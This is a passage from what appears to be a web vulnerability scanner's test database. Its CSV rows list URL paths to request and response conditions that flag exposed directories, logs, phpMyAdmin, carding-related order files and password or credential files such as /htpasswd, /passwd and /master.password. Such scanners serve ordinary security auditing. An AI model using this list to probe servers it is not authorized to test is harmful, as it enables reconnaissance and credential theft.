interesting.\",\"\",\"\"\n\"001670\",\"\",\"1\",\"/forum/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001671\",\"\",\"1\",\"/forums/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001672\",\"\",\"1\",\"/foto/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001673\",\"\",\"1\",\"/fotos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001674\",\"\",\"1\",\"/fpadmin/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001675\",\"\",\"1\",\"/ftp/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001676\",\"\",\"1\",\"/gfx/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001677\",\"\",\"1\",\"/global/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001678\",\"\",\"1\",\"/graphics/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001679\",\"\",\"1\",\"/guest/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001680\",\"\",\"1\",\"/guestbook/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001681\",\"\",\"1\",\"/guests/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001682\",\"\",\"1\",\"/hidden/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001683\",\"\",\"1\",\"/hitmatic/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001684\",\"\",\"1\",\"/hitmatic/analyse.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001685\",\"\",\"1\",\"/hits.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001686\",\"\",\"1\",\"/hit_tracker/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001687\",\"\",\"1\",\"/home/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001688\",\"\",\"1\",\"/homepage/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001689\",\"\",\"1\",\"/htdocs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001690\",\"\",\"1\",\"/html/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001691\",\"\",\"1\",\"/htpasswd\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001693\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/hyperstat/stat_what.log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001694\",\"\",\"1\",\"/ibill/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001695\",\"\",\"1\",\"/idea/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001696\",\"\",\"1\",\"/ideas/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001697\",\"\",\"1\",\"/imagenes/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001698\",\"\",\"1\",\"/img/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001699\",\"\",\"1\",\"/imgs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001700\",\"\",\"1\",\"/import/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001701\",\"\",\"1\",\"/impreso/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001702\",\"\",\"1\",\"/includes/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001703\",\"\",\"1\",\"/incoming/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001704\",\"\",\"1\",\"/info/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001705\",\"\",\"1\",\"/informacion/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001706\",\"\",\"1\",\"/information/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001707\",\"\",\"1\",\"/ingresa/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001708\",\"\",\"1\",\"/ingreso/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001709\",\"\",\"1\",\"/install/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001710\",\"\",\"1\",\"/internal/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001711\",\"\",\"1\",\"/intranet/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001712\",\"\",\"1\",\"/invitado/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001713\",\"\",\"1\",\"/invitados/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001714\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/java-plugin/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001715\",\"\",\"1\",\"/java/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001716\",\"\",\"1\",\"/jdbc/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001717\",\"\",\"1\",\"/job/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001718\",\"\",\"1\",\"/jrun/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001719\",\"\",\"1\",\"/js\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001720\",\"\",\"1\",\"/lib/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001721\",\"\",\"1\",\"/library/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001722\",\"\",\"1\",\"/libro/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001723\",\"\",\"1\",\"/linux/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001724\",\"\",\"1\",\"/log.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001725\",\"\",\"1\",\"/log.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001726\",\"\",\"1\",\"/log.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001727\",\"\",\"1\",\"/logfile\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001728\",\"\",\"1\",\"/logfile.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001729\",\"\",\"1\",\"/logfile.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001730\",\"\",\"1\",\"/logfile.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001731\",\"\",\"1\",\"/logfile/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001732\",\"\",\"1\",\"/logfiles/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001733\",\"\",\"1\",\"/logger.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001734\",\"\",\"1\",\"/logger/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001735\",\"\",\"1\",\"/logging/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001736\",\"\",\"1\",\"/login/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001737\",\"\",\"1\",\"/logs.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001738\",\"\",\"1\",\"/logs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001739\",\"\",\"1\",\"/logs/access_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001740\",\"\",\"1\",\"/logs/error_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001741\",\"\",\"1\",\"/lost+found/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001742\",\"\",\"1\",\"/mail/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001743\",\"\",\"1\",\"/manage/cgi/cgiproc\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001744\",\"\",\"1\",\"/marketing/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001745\",\"\",\"1\",\"/master.password\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001746\",\"\",\"1\",\"/mbox\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001747\",\"\",\"1\",\"/members/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001748\",\"\",\"1\",\"/message/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001749\",\"\",\"1\",\"/messaging/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001750\",\"\",\"1\",\"/ministats/admin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001751\",\"\",\"1\",\"/misc/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001752\",\"\",\"1\",\"/mkstats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001753\",\"\",\"1\",\"/movimientos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001754\",\"\",\"1\",\"/mp3/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001755\",\"\",\"1\",\"/mqseries/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001756\",\"\",\"1\",\"/msql/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001757\",\"\",\"1\",\"/msword/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001758\",\"\",\"1\",\"/Msword/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001759\",\"\",\"1\",\"/MSword/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001760\",\"\",\"1\",\"/NetDynamic/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001761\",\"\",\"1\",\"/NetDynamics/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001762\",\"\",\"1\",\"/netscape/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001763\",\"\",\"1\",\"/new\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001764\",\"\",\"1\",\"/new/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001765\",\"\",\"1\",\"/news\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001767\",\"\",\"1\",\"/noticias/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001768\",\"\",\"1\",\"/odbc/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001769\",\"\",\"1\",\"/officescan/cgi/jdkRqNotify.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001770\",\"\",\"1\",\"/old/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001771\",\"\",\"1\",\"/oracle\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001772\",\"\",\"1\",\"/oradata/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001773\",\"\",\"1\",\"/order/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001774\",\"\",\"1\",\"/orders/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001775\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/orders/checks.txt\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001776\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/orders/mountain.cfg\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001777\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/orders/orders.log\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001778\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/orders/orders.txt\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001779\",\"\",\"1\",\"/outgoing/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001780\",\"\",\"1\",\"/ows/\",\"GET\",\"CODE:200\",\"This might be interesting: Oracle Web Services?\",\"\",\"\"\n\"001781\",\"\",\"1\",\"/pages/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001782\",\"\",\"1\",\"/Pages/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001783\",\"\",\"1\",\"/passwd\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001784\",\"\",\"1\",\"/passwd.adjunct\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001785\",\"\",\"1\",\"/passwd.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001786\",\"\",\"1\",\"/passwdfile\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001787\",\"\",\"1\",\"/password\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001788\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/password/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001789\",\"\",\"1\",\"/passwords.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001790\",\"\",\"1\",\"/passwords/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001791\",\"\",\"1\",\"/PDG_Cart/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001792\",\"\",\"1\",\"/people.list\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001793\",\"\",\"1\",\"/perl5/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001794\",\"\",\"1\",\"/php/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001795\",\"\",\"b\",\"@PHPMYADMINchangelog.php\",\"GET\",\"BODY:phpMyAdmin\\s\\-\\sChangeLog\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"001796\",\"\",\"b\",\"@PHPMYADMINChangeLog\",\"GET\",\"BODY:phpMyAdmin\\s\\-\\sChangeLog\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"001797\",\"\",\"1\",\"/pics/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001798\",\"\",\"1\",\"/piranha/secure/passwd.php3\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001799\",\"\",\"1\",\"/pix/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001800\",\"\",\"1\",\"/poll\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001801\",\"\",\"1\",\"/polls\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001802\",\"\",\"1\",\"/porn/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001803\",\"\",\"1\",\"/pr0n/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001804\",\"\",\"1\",\"/privado/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001805\",\"\",\"1\",\"/private/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001806\",\"\",\"1\",\"/prod/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001807\",\"\",\"1\",\"/pron/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001808\",\"\",\"1\",\"/prueba/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001809\",\"\",\"1\",\"/pruebas/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001810\",\"\",\"1\",\"/pub/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001811\",\"\",\"1\",\"/public/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001812\",\"\",\"1\",\"/publica/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001813\",\"\",\"1\",\"/publicar/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001814\",\"\",\"1\",\"/publico/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001815\",\"\",\"1\",\"/purchase/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001816\",\"\",\"1\",\"/purchases/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001818\",\"\",\"1\",\"/pwd.db\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001819\",\"\",\"1\",\"/python/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001820\",\"\",\"1\",\"/readme\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001821\",\"\",\"1\",\"/README.TXT\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001822\",\"\",\"1\",\"/readme.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001823\",\"\",\"1\",\"/register/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001824\",\"\",\"1\",\"/registered/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001825\",\"\",\"1\",\"/reports/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001826\",\"\",\"1\",\"/reseller/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001827\",\"\",\"1\",\"/restricted/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001828\",\"\",\"1\",\"/retail/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001829\",\"\",\"1\",\"/reviews/newpro.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001830\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/root/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001831\",\"\",\"1\",\"/sales/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001832\",\"\",\"1\",\"/sample/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001833\",\"\",\"1\",\"/samples/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001834\",\"\",\"1\",\"/save/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001835\",\"\",\"1\",\"/scr/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001836\",\"\",\"1\",\"/scratch\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001837\",\"\",\"1\",\"/scripts/weblog\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001838\",\"\",\"1\",\"/search.vts\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001839\",\"\",\"1\",\"/search97.vts\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001840\",\"\",\"1\",\"/secret/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001841\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/secure/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001842\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/secured/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001843\",\"\",\"1\",\"/sell/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001844\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/server_stats/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001845\",\"\",\"1\",\"/service/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001846\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/services/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001847\",\"\",\"1\",\"/servicio/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001848\",\"\",\"1\",\"/servicios/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001849\",\"\",\"1\",\"/setup/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001850\",\"\",\"1\",\"/shop/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001851\",\"\",\"1\",\"/shopper/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001852\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/software/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001853\",\"\",\"1\",\"/solaris/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001854\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/source/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001855\",\"\",\"1\",\"/Sources/\",\"GET\",\"CODE:200\",\"This might be interesting: may be YaBB.\",\"\",\"\"\n\"001856\",\"\",\"1\",\"/spwd\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001857\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/sql/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001858\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/src/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001859\",\"\",\"1\",\"/srchadm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001860\",\"\",\"1\",\"/ss.cfg\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001861\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/ssi/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001862\",\"\",\"1\",\"/staff/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001863\",\"\",\"1\",\"/stat.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001864\",\"\",\"1\",\"/stat/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001865\",\"\",\"1\",\"/statistic/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001866\",\"\",\"1\",\"/Statistics/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001867\",\"\",\"1\",\"/statistics/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001868\",\"\",\"1\",\"/stats.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001869\",\"\",\"1\",\"/stats.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001870\",\"\",\"1\",\"/stats.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001871\",\"\",\"1\",\"/stats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001872\",\"\",\"1\",\"/Stats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001873\",\"\",\"1\",\"/status/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001874\",\"\",\"1\",\"/store/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001875\",\"\",\"1\",\"/StoreDB/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001876\",\"\",\"1\",\"/stylesheet/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001877\",\"\",\"1\",\"/stylesheets/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001878\",\"\",\"1\",\"/subir/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001879\",\"\",\"1\",\"/sun/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001880\",\"\",\"1\",\"/super_stats/access_logs\",\"GET\",\"CODE:200\",\"Web logs are exposed..\",\"\",\"\"\n\"001881\",\"\",\"1\",\"/super_stats/error_logs\",\"GET\",\"CODE:200\",\"Web logs are exposed.\",\"\",\"\"\n\"001882\",\"\",\"1\",\"/support/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001883\",\"\",\"1\",\"/swf\",\"GET\",\"CODE:200\",\"This might be interesting: Flash files?\",\"\",\"\"\n\"001884\",\"\",\"1\",\"/sys/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001885\",\"\",\"1\",\"/system/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001886\",\"\",\"1\",\"/tar/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001887\",\"\",\"1\",\"/tarjetas/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001888\",\"\",\"1\",\"/temp/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001889\",\"\",\"1\",\"/template/\",\"GET\",\"CODE:200\",\"This might be interesting: could have sensitive files or system information.\",\"\",\"\"\n\"001890\",\"\",\"1\",\"/temporal/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001891\",\"\",\"1\",\"/test.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001892\",\"\",\"1\",\"/test.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001893\",\"\",\"1\",\"/test.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001894\",\"\",\"1\",\"/test/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001895\",\"\",\"1\",\"/testing/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001896\",\"\",\"1\",\"/tests/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001897\",\"\",\"1\",\"/tmp/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001898\",\"\",\"1\",\"/tools/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001899\",\"\",\"1\",\"/tpv/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001900\",\"\",\"1\",\"/trabajo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001901\",\"\",\"1\",\"/trafficlog/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001902\",\"\",\"1\",\"/transito/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001903\",\"\",\"1\",\"/tree/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001904\",\"\",\"1\",\"/trees/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001905\",\"\",\"1\",\"/updates/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001906\",\"\",\"1\",\"/user/\",\"GET\",\"CODE:200\",\"This might be 